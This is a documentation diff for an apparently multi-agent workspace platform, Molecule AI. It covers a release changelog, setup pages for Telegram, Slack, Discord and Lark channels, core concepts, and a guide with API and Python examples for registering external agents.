See [Channels](/docs/channels).
(#844, #851)
#### AG-UI compatible SSE endpoint
New `GET /workspaces/:id/events` endpoint streams agent events as AG-UI
compatible Server-Sent Events. Enables AG-UI frontend integrations to subscribe
to live workspace activity without polling.
(#601)
#### A2A topology overlay on the canvas
The canvas now renders a live A2A topology overlay — every workspace as a node,
every in-flight delegation as an animated directed edge. Zoom to team, click any
edge to inspect the task payload.
(#751)
#### Audit trail visualisation panel
A new audit trail panel in the canvas surfaces the HMAC-SHA256 immutable event
log per workspace — every task received, LLM call, and completion in
chronological order with chain-of-custody verification.
(#651, #759)
#### Workspace hibernation — auto-pause idle workspaces
Workspaces that receive no tasks for `HIBERNATION_IDLE_MINUTES` (default: 30)
are automatically hibernated (containers paused, resources freed). They
auto-wake on the next inbound task with full state restored. Manage via
`POST /workspaces/:id/hibernate` and `POST /workspaces/:id/wake`.
See [API Reference](/docs/api-reference).
(#724)
#### Temporal workflow checkpoints — step-level persistence
Workspace templates now persist intermediate workflow steps to the database.
On container restart (crash, deploy, hibernate/wake) the workspace resumes from
the last completed step rather than restarting the whole task. Step endpoints
documented in the [API Reference](/docs/api-reference).
(#797, #803)
#### Semantic memory search
Agent memory is now vector-indexed via pgvector. `recall_memory` accepts an
optional `?q=` parameter for semantic (embedding) search in addition to exact
keyword match. Nearest-neighbour results are ranked by cosine similarity and
colour-coded in the canvas Memory Inspector.
(#784, #787)
#### Memory Inspector panel
A new canvas panel lets you browse, search, and inspect all `LOCAL` and `TEAM`
memory keys for any workspace — live, without leaving the canvas.
(#738)
#### Hermes — stacked system messages
The Hermes runtime now accepts a `system_blocks` list: each block (persona,
tools, reasoning policy) is merged in order rather than overwriting the previous
system prompt. Enables persona stacking for complex multi-role workflows.
See [API Reference](/docs/api-reference) → Runtimes section.
(#655, #798)
#### Hermes — native `tools` parameter
Hermes passes tools to the model via the native `tools=[]` API parameter instead
of text-in-prompt injection. Structured tool definitions, better token efficiency,
and full compatibility with Nous/Hermes-3 tool call format.
(#644)
#### Hermes — structured output (`response_format`)
`response_format=json_schema` is now wired through to the model. Hermes
workspaces can request strict JSON output against a defined schema.
(#645)
#### AGENTS.md auto-generation
Platform workspaces now auto-generate an `AGENTS.md` file in the workspace
container at boot. The file lists all peer workspaces visible to this workspace,
their roles, and their capabilities — giving LLMs automatic context about the
org topology without manual prompt engineering.
(#763)
#### Discord channel adapter
A new Discord adapter joins Telegram, Slack, and Lark. Configure with a
`bot_token` and `channel_id` to send and receive messages on Discord.
(#656)
#### Per-workspace budget limits
Set a `budget_limit` (USD) on any workspace. The A2A executor enforces the limit
at task dispatch — tasks that would exceed the monthly cap are rejected with a
`429 Budget Exceeded` error. Configure via `PATCH /workspaces/:id`.
(#611, #606)
#### Per-workspace token metrics
`GET /workspaces/:id/metrics` returns token counts (input, output, cache read/write)
aggregated over rolling 1-hour and 30-day windows. Live usage is displayed in the
canvas WorkspaceUsage panel.
(#602, #627)
#### Claude Opus 4.7 — effort levels and task budget
Workspace config now exposes `effort` (`low` / `medium` / `high` / `xhigh` /
`max`) and `task_budget` (token ceiling) for Anthropic Claude workspaces.
`xhigh` and `max` activate extended thinking (Opus 4.7+ only). Configure in the
Canvas Config tab or via `PATCH /workspaces/:id`.
(#639, #654, #669)
#### Plugin supply-chain hardening
All plugin refs must now be pinned (no `latest`, no floating branches). Unpinned
refs are blocked at load time unless `PLUGIN_ALLOW_UNPINNED=true`. SHA-256
integrity checking available for plugin archives.
(#775)
#### Org-level plugin governance registry
A new per-org allowlist controls which plugins workspaces in that org are
permitted to load. Managed via `POST/DELETE /admin/orgs/:orgId/plugins/allowlist`.
(#610)
#### Schedule health endpoint
`GET /admin/schedules/health` returns cross-workspace cron health: last-fired,
next-scheduled, consecutive-empty count, and phantom detection status for every
schedule in the org.
(#671, #796)
#### Fly Machines provisioner
The platform now supports `PROVISIONER=flyio` — workspaces are provisioned as
Fly Machines instead of Docker containers or EC2 instances. See the
[self-hosting guide](/docs/self-hosting).
(#578 — docs PR #7)
### 🔒 Security
- **Auth hardening** — PATCH `/workspaces/:id` now requires ownership
validation; UUID fields are validated before DB queries; input lengths bounded
across all handlers. (#692, #701)
- **Admin token isolation** — `AdminAuth` middleware correctly rejects workspace
bearer tokens when `ADMIN_TOKEN` is set, preventing privilege escalation from
workspace token → admin. (#684, #729)
- **Metrics route auth** — `GET /workspaces/:id/metrics` now requires workspace
bearer token; previously it was unauthenticated. (#696)
- **X-Workspace-ID forgery** — Requests spoofing the `system-caller/` prefix in
`X-Workspace-ID` headers are rejected. (#766)
- **GLOBAL memory injection safeguards** — `commit_memory` with `scope: GLOBAL`
now validates content for prompt injection patterns before persisting. (#769)
- **Security headers** — `X-Content-Type-Options: nosniff` and
`X-Frame-Options: DENY` added to all API responses. (#629)
- **Token revocation hardening** — Revoked tokens are purged from the in-memory
cache within 60s; previously the cache could serve revoked tokens until TTL
expiry. (#696)
- **MCP server** — npm version pinned; `-y` flag removed from install commands.
(SAFE-MCP NEW-003, #808 — docs PR #18)
- **Canvas test-token endpoint** — gated behind `AdminAuth` and removed from
general router. (#612, #708)
### 🔧 Fixes
- Fixed `POST /workspaces` not persisting the secrets envelope on create. (#568)
- Fixed self-delegation deadlock when a workspace delegates to itself. (#570)
- Fixed GitHub installation token expiry — tokens now refresh automatically before
expiry rather than failing mid-operation. (#567)
- Fixed `TenantGuard` same-origin bypass for EC2 tenant Canvas. (#584)
- Fixed pgvector migration to wrap in `DO` block, eliminating E2E CI failures
from duplicate extension install. (#843, #670, #636)
- Fixed scheduler dropping schedules with `NULL next_run_at` permanently. (#728)
- Fixed `ValidateToken` not checking `removed` workspace status, allowing tokens
for deleted workspaces to authenticate. (#719)
- Fixed canvas hydration error UI, radio keyboard nav, and zoom-to-team
shortcut. (#565)
- Fixed canvas UX: error handling, accessibility, loading state. (#587)
- Fixed canvas deploy preflight to require env keys for Hermes and Gemini CLI
runtimes. (#588)
- Fixed budget/spend counters capping before DB upsert to prevent NUMERIC
overflow. (#630, #634)
- Fixed pgvector TEXT→UUID FK type mismatch in migrations 028 and 031 that
blocked all E2E runs. (#646, #670, #843)
- Fixed duplicate hook firings (34×) in `dedup_settings_hooks`. (#551, #597)
- Accessibility fixes: keyboard access on `TeamMemberChip`, `role=alert` on
status banners, close button label, `ProvisioningTimeout` modal. (#841)
### 📚 Docs
- Google ADK runtime — added hands-on Quickstart section. (docs PR #8)
- Hermes — full runtime reference page. (docs PR #9)
- AGENTS.md — auto-generation documented in concepts. (docs PR #10)
- Semantic memory search — `?q=` param documented in API reference. (docs PR #11)
- Canvas A2A topology overlay + audit trail panel. (docs PR #12)
- molecule-medo plugin — opt-in platform plugin page. (docs PR #13)
- Workspace hibernation — status lifecycle, endpoints, auto-wake behaviour. (docs PR #14)
- molecule-audit-ledger — HMAC chain, `/audit` endpoint, `LedgerHooks`, CLI. (docs PR #15)
- Hermes stacked system messages — `system_blocks` kwarg. (docs PR #16)
- Plugin supply chain security — pinned refs required, SHA-256 integrity. (docs PR #17)
- SAFE-MCP audit report 2026-04-17. (docs PR #18)
- Temporal workflow checkpoints — step endpoints, auto-resume behaviour. (docs PR #19)
---
_Changelog entries are compiled by the [Documentation Specialist](https://github.com/Molecule-AI) from all merged pull requests for the day. Times are UTC._

338
content/docs/channels.mdx Normal file
View File

@ -0,0 +1,338 @@
---
title: Channels
description: Connect workspaces to Telegram, Slack, Discord, and Lark/Feishu for social integrations.
---
## Overview
Channels let workspaces send and receive messages on social platforms. Each
workspace can have multiple channel integrations — a Telegram bot, a Slack
webhook, a Discord webhook, a Lark/Feishu Custom Bot — configured independently with per-channel
allowlists and JSONB config.
Outbound messages flow from the workspace through the platform adapter to the
social platform. Inbound messages arrive via webhooks (`POST /webhooks/:type`),
are parsed by the adapter, and forwarded to the workspace as A2A
`message/send` requests.
```
User (Telegram/Slack/Discord/Lark) ──webhook──> Platform ──A2A──> Workspace Agent
<──adapter── (response)
User <──bot message────────────────────────────────────────────────/
```
---
## Adapters
Four adapters are registered out of the box. Use `GET /channels/adapters` to
list them at runtime.
### Telegram
Uses the Telegram Bot API. Supports both long-polling (for inbound) and direct
API calls (for outbound). The adapter caches `BotAPI` instances to avoid
repeated `getMe` calls.
**Required config fields:**
| Field | Type | Description |
|-------|------|-------------|
| `bot_token` | string | Telegram bot token (`123456789:ABCdef...`). Validated against a strict regex. |
| `chat_id` | string | Comma-separated chat IDs to listen on and send to. |
**Features:**
- Long-polling with 30s timeout and 2s retry interval
- Auto-reply to `/start` with the chat ID (useful for setup)
- Bot commands: `/start`, `/help`, `/reset` (clear history), `/cancel` (best-effort)
- Long messages automatically split at paragraph/line/word boundaries (4096 char limit)
- Typing indicator sent while the agent processes
- Rate-limit handling with `retry_after` backoff
- Auto-discovers chats via `getUpdates` (including `my_chat_member` events for group adds)
- Auto-disables the channel when the bot is kicked from a chat
### Slack
Supports two outbound modes — Bot Token (recommended) and Incoming Webhook
(legacy). Inbound uses the Slack Events API in both modes.
**Config fields:**
| Field | Type | Required | Description |
|-------|------|----------|-------------|
| `bot_token` | string | One of `bot_token` / `webhook_url` | Slack Bot User OAuth Token (`xoxb-…`). Enables per-agent display name and icon via `chat:write.customize`. |
| `webhook_url` | string | One of `bot_token` / `webhook_url` | Incoming Webhook URL (must start with `https://hooks.slack.com/`). Used as fallback when `bot_token` is absent. |
| `channel` | string | Required with `bot_token` | Target channel ID or name (e.g. `C01234ABCDE` or `#general`). |
| `username` | string | Optional | Display name override shown in Slack (Bot Token mode only). |
| `icon_emoji` | string | Optional | Emoji icon for the agent's avatar (e.g. `:robot_face:`). Bot Token mode only. |
**Features:**
- **Bot Token mode** — per-agent identity: each workspace can post with its own
name and icon using `chat.postMessage` + `chat:write.customize`. Markdown is
automatically converted to Slack `mrkdwn` format.
- **Webhook mode** — simple outbound-only integration, no OAuth required.
- Inbound via Events API JSON payload or slash command (URL-encoded form).
- `url_verification` challenge handshake supported.
- Slash commands prepend the command name so the agent sees the full invocation.
**Required Slack app scopes (Bot Token mode):**
`chat:write`, `chat:write.customize`, `channels:history`, `app_mentions:read`
### Discord
Uses Discord Incoming Webhooks for outbound and Discord Interactions (slash commands) for inbound. Discord uses a push-based interactions model — there is no long-polling; the platform receives signed payloads at the interactions endpoint.
**Required config fields:**
| Field | Type | Description |
|-------|------|-------------|
| `webhook_url` | string | Discord Incoming Webhook URL. Must start with `https://discord.com/api/webhooks/`. Validated on creation (matches the Slack SSRF-guard pattern). |
**Global secret:**
```bash
# Register the webhook URL as a global or per-workspace secret
curl -X PUT http://localhost:8080/settings/secrets \
-H 'Content-Type: application/json' \
-d '{"key":"DISCORD_WEBHOOK_URL","value":"https://discord.com/api/webhooks/..."}'
```
**Features:**
- Outbound via Incoming Webhook — POSTs `{"content": "<text>"}` to the webhook URL
- Long messages automatically split at newline/space boundaries (Discord 2000-character hard limit)
- Inbound via Discord Interactions — no long-polling; Discord pushes signed payloads
- **Type 1 PING** — router layer responds `{"type":1}`; adapter returns `nil` (no A2A forward)
- **Type 2 APPLICATION\_COMMAND** — slash command, forwarded as `/commandname option1 option2`
- **Type 3 MESSAGE\_COMPONENT** — button/select interaction, forwarded as component data
- User identity prefers `member.user` (guild) over `user` (DM) for consistent routing
- `StartPolling` is a no-op (returns nil) — Discord uses interactions, not polling
**Setup:**
1. **Incoming Webhook** — Discord Server → channel settings → Integrations → Webhooks → New Webhook → Copy Webhook URL
2. Add as a secret: `PUT /settings/secrets` with `DISCORD_WEBHOOK_URL`
3. **Slash commands (inbound)** — create a Discord Application at [discord.com/developers](https://discord.com/developers/applications), set the **Interactions Endpoint URL** to `https://<platform-host>/webhooks/discord`
4. Verify the endpoint: Discord sends a type-1 PING; the platform responds `{"type":1}` automatically
**Example config:**
```json
{
"type": "discord",
"config": {
"webhook_url": "https://discord.com/api/webhooks/1234567890/abcdef..."
}
}
```
<Callout type="info">
Discord does not support bot-initiated long-polling. Inbound messages only work via slash commands registered in your Discord Application. If you only need outbound (workspace → Discord), no Application setup is required — just add the webhook URL.
</Callout>
---
### Lark / Feishu
Outbound via Custom Bot webhooks, inbound via Event Subscriptions.
**Required config fields:**
| Field | Type | Description |
|-------|------|-------------|
| `webhook_url` | string | Custom Bot webhook URL. Must start with `https://open.feishu.cn/open-apis/bot/v2/hook/` or `https://open.larksuite.com/open-apis/bot/v2/hook/`. |
**Optional config fields:**
| Field | Type | Description |
|-------|------|-------------|
| `verify_token` | string | Verification Token from the app's Event Subscriptions page. When set, inbound events with a mismatching token are rejected. |
**Features:**
- Both China (`open.feishu.cn`) and international (`open.larksuite.com`) endpoints supported
- `url_verification` handshake with constant-time `verify_token` comparison
- v2 event payload parsing (`im.message.receive_v1`)
- Token verification on both `url_verification` and `event_callback` payloads
- Application-level error codes checked (Lark returns HTTP 200 even for app errors)
---
## Setup Flow
### 1. Create a Channel
```bash
curl -X POST http://localhost:8080/workspaces/{id}/channels \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{
"type": "telegram",
"config": {
"bot_token": "123456789:ABCdefGHIjklmnopQRSTuvwxyz",
"chat_id": "-1001234567890"
}
}'
```
### 2. Test the Connection
```bash
curl -X POST http://localhost:8080/workspaces/{id}/channels/{channelId}/test \
-H "Authorization: Bearer {token}"
```
### 3. Send a Message
```bash
curl -X POST http://localhost:8080/workspaces/{id}/channels/{channelId}/send \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{"text": "Hello from the agent!"}'
```
---
## Inbound Webhooks
Register your platform's public URL as the webhook endpoint for each social
platform. Inbound messages arrive at:
```
POST /webhooks/:type
```
where `:type` is `telegram`, `slack`, `discord`, or `lark`. The platform:
1. Looks up all channels of that type
2. Calls the adapter's `ParseWebhook` to extract a standardized `InboundMessage`
3. Checks the allowlist (if configured)
4. Forwards the message to the workspace via A2A `message/send`
For Telegram, the platform can also use long-polling instead of webhooks,
started automatically when a Telegram channel is created.
For Discord, the platform automatically handles type-1 PING interactions (required by Discord for endpoint verification) and forwards type-2 and type-3 interaction payloads to the workspace.
---
## Discover Chats
Auto-detect available chats for a bot token before creating a channel:
```bash
curl -X POST http://localhost:8080/channels/discover \
-H "Content-Type: application/json" \
-d '{"type": "telegram", "bot_token": "123456789:ABCdef..."}'
```
Returns the bot username, discovered chats (with IDs, names, and types), and
whether the bot can read all group messages (Telegram privacy mode).
---
## Allowlists
Each channel row has an `allowed_users` JSONB array. When non-empty, only
messages from users whose IDs appear in the list are forwarded to the workspace.
All others are silently dropped.
---
## Config Encryption
Sensitive config fields (like `bot_token`) are encrypted at rest. The `List`
endpoint decrypts them server-side and masks tokens in the response
(showing only the first 4 and last 4 characters).
---
## API Reference
| Method | Path | Description |
|--------|------|-------------|
| GET | `/channels/adapters` | List available adapter types |
| POST | `/channels/discover` | Auto-detect chats for a bot token |
| GET | `/workspaces/:id/channels` | List channels for a workspace |
| POST | `/workspaces/:id/channels` | Add a channel |
| PATCH | `/workspaces/:id/channels/:channelId` | Update a channel |
| DELETE | `/workspaces/:id/channels/:channelId` | Remove a channel |
| POST | `/workspaces/:id/channels/:channelId/test` | Test connection |
| POST | `/workspaces/:id/channels/:channelId/send` | Send outbound message |
| POST | `/webhooks/:type` | Incoming social webhook |
---
## Example Configs
### Telegram
```json
{
"type": "telegram",
"config": {
"bot_token": "123456789:ABCdefGHIjklmnopQRSTuvwxyz_1234",
"chat_id": "-1001234567890"
}
}
```
Multiple chats (comma-separated):
```json
{
"type": "telegram",
"config": {
"bot_token": "123456789:ABCdefGHIjklmnopQRSTuvwxyz_1234",
"chat_id": "-1001234567890, -1009876543210"
}
}
```
### Slack
```json
{
"type": "slack",
"config": {
"webhook_url": "https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
}
}
```
### Discord
```json
{
"type": "discord",
"config": {
"webhook_url": "https://discord.com/api/webhooks/1234567890123456789/abcdefGHIjklmnopQRSTuvwxyz_1234"
}
}
```
### Lark / Feishu
```json
{
"type": "lark",
"config": {
"webhook_url": "https://open.larksuite.com/open-apis/bot/v2/hook/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
"verify_token": "your-verification-token"
}
}
```
China endpoint:
```json
{
"type": "lark",
"config": {
"webhook_url": "https://open.feishu.cn/open-apis/bot/v2/hook/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"
}
}
```

216
content/docs/concepts.mdx Normal file
View File

@ -0,0 +1,216 @@
---
title: Concepts
description: The core primitives that compose every Molecule AI org — workspaces, plugins, channels, schedules, tokens, external agents, and the canvas.
---
## Workspaces
A **workspace** is a real Docker container running a real LLM agent. Each
workspace has:
- A **role** (a one-line job description fed into its system prompt — also
written to `/workspace/AGENTS.md` so peers can discover it)
- An **initial prompt** (run once at first boot — typically clone repo,
read docs, memorise context)
- A **runtime** (`claude-code`, `langgraph`, `crewai`, `autogen`, `deepagents`,
`openclaw`, `hermes`, `gemini-cli`, [`google-adk`](/docs/google-adk))
- A **tier** (resource budget — T1 sandboxed, T2 standard, T3 privileged, T4 full-host)
- An optional **parent** (forms the org tree)
- An optional **workspace_dir** (a host path bind-mounted into the
container — gives the agent direct access to your codebase)
- An optional **budget_limit** (workspace-level spend cap — see [Workspace budgets](#workspace-budgets) below)
Workspaces talk to each other via **A2A** (agent-to-agent) messages, routed
by the platform. Communication rules: same workspace, siblings, and
parent/child are allowed; everything else is denied.
See the [API Reference](/docs/api-reference#budget) for the full endpoint specification.
### Workspace status lifecycle
| Status | Meaning | Resumes via |
|--------|---------|-------------|
| `provisioning` | Container being started | automatic |
| `online` | Running and accepting tasks | — |
| `degraded` | Heartbeat `error_rate > 0.5` | auto-recovers |
| `offline` | Missed heartbeats (liveness sweep) | auto-restart |
| `paused` | Manually stopped via `/pause` | `POST /resume` |
| `hibernated` | Auto-paused after idle timeout (or via `/hibernate`) | automatic on next A2A message |
| `removed` | Deleted | — |
**Hibernation** is an opt-in automatic cost-saving mode. Set `hibernation_idle_minutes` in the workspace's `config.yaml` to enable it. When a hibernated workspace receives an A2A message, the platform wakes it automatically (returning `503 Retry-After: 15` while it comes online). See [API Reference — Lifecycle](/docs/api-reference#lifecycle) for the `/hibernate` endpoint and configuration details.
## External agents
An **external agent** is a workspace with `runtime: external` — it runs on
your own infrastructure instead of the platform's Docker network. External
agents:
- Register via `POST /registry/register` and receive a bearer token
- Send heartbeats every 30 seconds to stay online
- Accept A2A messages at their registered URL
- Appear on the canvas with a purple **REMOTE** badge
- Skip Docker health sweep (liveness is heartbeat-only)
See [External Agents](/docs/external-agents) for the full registration guide.
## Plugins
A **plugin** is a bundle of capabilities a workspace can install:
- **Hooks** — `PreToolUse`, `PostToolUse`, `UserPromptSubmit` — for
guardrails, audit trails, dangerous-command refusal
- **Skills** — multi-criteria code review, cross-vendor adversarial
review, LLM-as-judge gates
- **Slash commands** — `/triage`, `/retro`, etc.
- **MCP servers** — bring in tools the model can call
Plugins have two axes: **source** (where to fetch — `local://`, `github://`)
and **shape** (what's inside — agentskills.io format, MCP server, etc.).
Plugins compose. Per-workspace plugin lists **UNION** with the org-wide
defaults — adding one capability to one role doesn't require re-listing
every default. Use `!plugin-name` to opt a specific default out.
See [Plugins](/docs/plugins) for the full guide.
## Channels
A **channel** wires a workspace to an external messaging platform:
| Adapter | Platform | Config |
|---------|----------|--------|
| `telegram` | Telegram | Bot token + chat_id allowlist |
| `slack` | Slack | Bot token (or Incoming Webhook URL) + channel |
| `discord` | Discord | Incoming Webhook URL (+ optional slash-command interactions) |
| `lark` | Lark / Feishu | Custom Bot webhook + Event Subscriptions |
Once connected, users can talk to agents from outside the canvas — and
agents can broadcast back. Inbound messages arrive via webhook and are
routed to the workspace as A2A messages.
See [Channels](/docs/channels) for setup instructions.
## Schedules
A **schedule** is a cron-driven recurring prompt. Each tick fires an A2A
message into the workspace, which the agent treats as a new task. Schedules
are supervised — panics in the dispatch path are recovered with exponential
backoff, and a liveness watchdog surfaces stuck subsystems via
`/admin/liveness`.
Schedules let you build the *evolution* loop: hourly security audits,
daily ecosystem watches, weekly plugin curation, etc.
See [Schedules](/docs/schedules) for the full guide.
## Tokens
**Bearer tokens** authenticate agents and API clients. Each token is
scoped to a single workspace — a token from workspace A cannot access
workspace B.
- Issued on first registration (`POST /registry/register`)
- Create/list/revoke via `GET/POST/DELETE /workspaces/:id/tokens`
- 256-bit entropy, sha256-hashed in DB, plaintext shown once
See [Token Management](/docs/tokens) for the full guide.
## The canvas
The **canvas** is a Next.js 15 React Flow visualisation of your org.
Every workspace is a node. Every A2A message is an edge. Every memory
write, every scheduled fire, every status change pushes a WebSocket
event in real time.
The canvas isn't just a viewer — it's the operator surface. Drag nodes
to reorganise teams, click to chat, right-click for actions, watch the
team work in real time.
### A2A Topology Overlay
The canvas renders **live delegation edges** on top of the workspace graph.
When one agent delegates to another, a directed edge appears:
- **Animated violet** — delegation occurred within the last 5 minutes
- **Static blue** — delegation occurred earlier
The overlay polls `GET /workspaces/:id/activity?type=delegation` for every
visible node every 60 seconds. Toggle it on/off with the **A2A** button in
the toolbar (⊞ mesh icon) — the setting persists across page loads.
### Audit Trail Panel
Every workspace's **Side Panel → Audit** tab (⊟ ledger icon) shows the
workspace's tamper-evident audit ledger via `GET /workspaces/:id/audit`.
Each entry records what happened (event type, actor, outcome) and whether
its hash chain is intact.
| Event type | Colour | Meaning |
|-----------|--------|---------|
| `delegation` | Blue | An A2A delegation was made or received |
| `decision` | Violet | A gate or approval decision was recorded |
| `gate` | Yellow | A HITL or automated gate was evaluated |
| `hitl` | Orange | A human-in-the-loop approval request |
Entries with `chain_valid: false` display a red ⚠ tamper indicator —
investigate immediately; the audit chain may have been modified offline.
Use the event-type filter bar at the top of the panel to narrow results.
Click **Load more** to paginate (cursor-based, 50 entries per page).
### Memory Inspector panel
The **Memory Inspector** (Side Panel → Memory tab, 🧠 icon) lets you browse, search, and inspect all `LOCAL` and `TEAM` memory keys for any workspace — live, without leaving the canvas.
- **Browse** — all memory keys for the selected workspace, grouped by HMA scope (`LOCAL`, `TEAM`)
- **Semantic search** — enter a query to run `GET /workspaces/:id/memories?q=<query>` against the vector index; results are colour-coded by cosine similarity score
- **Inspect** — click any key to expand its full value and metadata (`created_at`, scope, last writer)
The inspector polls on workspace selection change and on each heartbeat. Changes from agents running in parallel appear within one heartbeat cycle (~15s).
## How they fit together
A typical org definition:
```yaml
org_name: My Team
defaults:
runtime: claude-code
tier: 2
plugins: [ecc, molecule-dev, superpowers, molecule-careful-bash]
category_routing:
security: [Backend Engineer]
ui: [Frontend Engineer]
workspaces:
- name: PM
role: "Product manager — triages issues, reviews PRs, unblocks the team."
canvas: { x: 400, y: 50 }
plugins: [molecule-workflow-triage]
channels:
- type: telegram
config: { bot_token: "${TELEGRAM_BOT_TOKEN}", chat_id: "12345" }
children:
- name: Dev Lead
role: "Tech lead — coordinates engineering sub-teams and owns architecture."
children:
- name: Frontend Engineer
role: "Frontend specialist — React, TypeScript, Canvas UI."
- name: Backend Engineer
role: "Backend specialist — Go platform, API, migrations, CI."
schedules:
- name: Hourly typecheck
cron_expr: "0 * * * *"
prompt: "Run npm run typecheck and report any new errors..."
```
That's the mental model. Templates → plugins → channels → schedules →
tokens → canvas. Everything else in the docs is depth on one of these
primitives.
## MCP integration
Any MCP-compatible AI agent can manage Molecule AI workspaces using the
[MCP Server](/docs/mcp-server) — 87 tools covering workspace CRUD,
communication, secrets, memory, files, schedules, channels, plugins,
and more. Install via `npx @molecule-ai/mcp-server`.

View File

@ -1,3 +1,6 @@
---
title: "Build Order"
---
# Build Order
The core loop to prove first: **workspace registers -> canvas shows it -> heartbeat keeps it alive -> workspace goes offline -> canvas shows it gray.**

View File

@ -1,3 +1,6 @@
---
title: "Code Sandbox"
---
# Code Sandbox
The code sandbox isolates agent-generated code execution — specifically the `run_code` tool that executes dynamically generated scripts. Not user-submitted code (there is no user code submission in Molecule AI) — the agent's own generated code is what needs sandboxing.

View File

@ -1,3 +1,6 @@
---
title: "Constraints & Rules"
---
# Constraints & Rules
Key design rules and invariants that must be followed throughout the codebase.

View File

@ -1,3 +1,6 @@
---
title: "Local Development"
---
# Local Development
## Starting the Stack

View File

@ -1,3 +1,6 @@
---
title: "Observability (Langfuse)"
---
# Observability (Langfuse)
## Overview

View File

@ -1,3 +1,6 @@
---
title: "E2E Testing"
---
# E2E Testing
End-to-end test scripts live under `tests/e2e/` and exercise the platform against a real Postgres + Redis. Every script is shellcheck-clean and shares helpers from `tests/e2e/_lib.sh` + `tests/e2e/_extract_token.py`.

View File

@ -0,0 +1,239 @@
---
title: External Agents
description: Register agents running outside the platform's Docker network as first-class workspaces on the canvas.
---
External agents are AI agents running on your own infrastructure — a different
cloud, an edge device, or your laptop — that join the Molecule AI canvas as
first-class workspaces. They communicate with other agents via A2A, appear on
the canvas with a purple **REMOTE** badge, and are managed like any other workspace.
## Prerequisites
- A running Molecule AI platform (default `http://localhost:8080`)
- Your agent must expose an HTTP endpoint that accepts A2A JSON-RPC messages
## Step 1 — Create the workspace
```bash
curl -X POST http://localhost:8080/workspaces \
-H "Content-Type: application/json" \
-d '{
"name": "My External Agent",
"external": true,
"url": "https://my-agent.example.com",
"tier": 2
}'
```
The response includes the workspace `id`. Save it.
<Callout type="warn">
URLs must be publicly reachable. Private IPs (10.x, 172.16.x, 192.168.x, 127.x,
169.254.x) are rejected for SSRF protection.
</Callout>
## Step 2 — Register with the platform
```bash
curl -X POST http://localhost:8080/registry/register \
-H "Content-Type: application/json" \
-d '{
"workspace_id": "<id-from-step-1>",
"url": "https://my-agent.example.com",
"agent_card": {
"name": "My Agent",
"description": "Research assistant",
"skills": ["research", "analysis"],
"runtime": "external"
}
}'
```
The response includes `auth_token` — **save this immediately**, it is shown only
once and cannot be recovered.
## Step 3 — Start the heartbeat loop
Send a heartbeat every 30 seconds to keep your workspace online:
```bash
curl -X POST http://localhost:8080/registry/heartbeat \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <auth_token>" \
-d '{
"workspace_id": "<id>",
"status": "online",
"active_tasks": 0,
"current_task": "",
"error_rate": 0.0,
"uptime_seconds": 3600
}'
```
If the heartbeat stops for 60 seconds, the workspace automatically goes offline.
## Step 4 — Handle incoming A2A messages
Your agent must accept POST requests at the registered URL with A2A JSON-RPC format:
```json
{
"jsonrpc": "2.0",
"method": "message/send",
"params": {
"message": {
"role": "user",
"parts": [{"type": "text", "text": "Hello from another agent"}]
}
},
"id": "req-123"
}
```
Respond with a JSON-RPC result:
```json
{
"jsonrpc": "2.0",
"result": {
"status": "completed",
"artifacts": [
{
"parts": [{"type": "text", "text": "Hello back!"}]
}
]
},
"id": "req-123"
}
```
## Step 5 — Send messages to other agents
```bash
curl -X POST http://localhost:8080/workspaces/<target-id>/a2a \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <auth_token>" \
-H "X-Workspace-ID: <your-workspace-id>" \
-d '{
"jsonrpc": "2.0",
"method": "message/send",
"params": {
"message": {
"role": "user",
"parts": [{"type": "text", "text": "Can you help with this?"}]
}
},
"id": "msg-001"
}'
```
## Step 6 — Discover peers
```bash
# Your workspace info
curl http://localhost:8080/registry/discover/<your-id> \
-H "Authorization: Bearer <auth_token>" \
-H "X-Workspace-ID: <your-id>"
# Find siblings/parent/child workspaces
curl http://localhost:8080/registry/<your-id>/peers \
-H "Authorization: Bearer <auth_token>" \
-H "X-Workspace-ID: <your-id>"
```
## Communication rules
| Relationship | Allowed? |
|---|---|
| Same workspace | Yes |
| Siblings (same parent) | Yes |
| Parent to child | Yes |
| Child to parent | Yes |
| Root-level siblings | Yes |
| Everything else | No |
## Python example
```python
import requests
import threading
import time
from flask import Flask, request, jsonify
PLATFORM = "http://localhost:8080"
# 1. Create workspace
ws = requests.post(f"{PLATFORM}/workspaces", json={
"name": "Python Research Agent",
"external": True,
"url": "http://my-host:5000",
"tier": 2,
}).json()
WS_ID = ws["id"]
# 2. Register
reg = requests.post(f"{PLATFORM}/registry/register", json={
"workspace_id": WS_ID,
"url": "http://my-host:5000",
"agent_card": {
"name": "Python Research Agent",
"skills": ["research"],
"runtime": "external",
},
}).json()
TOKEN = reg["auth_token"]
HEADERS = {"Authorization": f"Bearer {TOKEN}"}
# 3. Heartbeat loop
def heartbeat():
while True:
requests.post(f"{PLATFORM}/registry/heartbeat",
json={"workspace_id": WS_ID, "active_tasks": 0},
headers=HEADERS)
time.sleep(30)
threading.Thread(target=heartbeat, daemon=True).start()
# 4. A2A endpoint
app = Flask(__name__)
@app.route("/", methods=["POST"])
def handle_a2a():
data = request.json
text = data["params"]["message"]["parts"][0]["text"]
return jsonify({
"jsonrpc": "2.0",
"result": {
"status": "completed",
"artifacts": [{"parts": [{"type": "text", "text": f"Received: {text}"}]}],
},
"id": data["id"],
})
app.run(host="0.0.0.0", port=5000)
```
## Canvas appearance
External workspaces appear on the canvas with a purple **REMOTE** badge.
They support drag-and-drop positioning, nesting into teams, real-time status
updates via heartbeat, and chat via A2A messages.
## Lifecycle
```
create (POST /workspaces) → online (register) → offline (heartbeat expires)
→ removed (deleted)
```
- External workspaces skip Docker health sweep — only heartbeat TTL matters
- No auto-restart (agent manages its own process)
- Paused external workspaces skip heartbeat monitoring
## Security
- Bearer token required on all authenticated endpoints
- Tokens are 256-bit random, sha256-hashed — only the hash is stored
- Token shown once at registration, never recoverable
- See [Token Management](/docs/tokens) for create/list/revoke API

View File

@ -1,3 +1,6 @@
---
title: "Canvas UI (Next.js Frontend)"
---
# Canvas UI (Next.js Frontend)
The canvas is Molecule AI's operational UI. It is not just a graph viewer. It is the place where teams deploy workspaces, inspect live state, configure runtimes, browse files, watch activity, and chat with agents.

311
content/docs/google-adk.mdx Normal file
View File

@ -0,0 +1,311 @@
---
